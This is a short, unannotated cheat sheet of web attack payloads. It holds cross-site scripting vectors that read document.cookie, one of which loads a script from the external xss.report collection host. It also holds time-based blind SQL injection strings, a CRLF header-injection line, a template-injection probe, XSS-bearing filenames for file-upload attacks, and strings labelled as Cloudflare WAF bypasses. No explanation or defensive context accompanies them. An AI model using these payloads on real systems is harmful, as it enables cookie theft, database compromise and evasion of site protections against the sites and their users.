script><svg/onload=prompt`{document.cookie}`>
/%%0a0aSet-Cookie:crlf
{7*7}
javascript://test.com`
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
<svg%20oNinad=1%20onload=alert(document.cookie)>
mark+'></script><script/src=//xss.report/c/marksocrates>'@gmail.com
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
javascript%0a:\u0061lert(origin)
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
(CLOUDFLARE BYPASS)
<meta http-equiv="refresh" content="2; https://example[.]com/" />
(HTML INJECTION)
'XOR(if(now()=sysdate(),sleep(33),0))OR'
(SLEEP SQL INJECTION)
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
<svg onload=alert(document.domain)>.jpg
(IMAGE XSS FILE UPLOAD)
<a"/onclick=(confirm)(origin)>Click Here!
(CLOUDFLARE WAF BYPASS)
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
(SQL-INJECTION)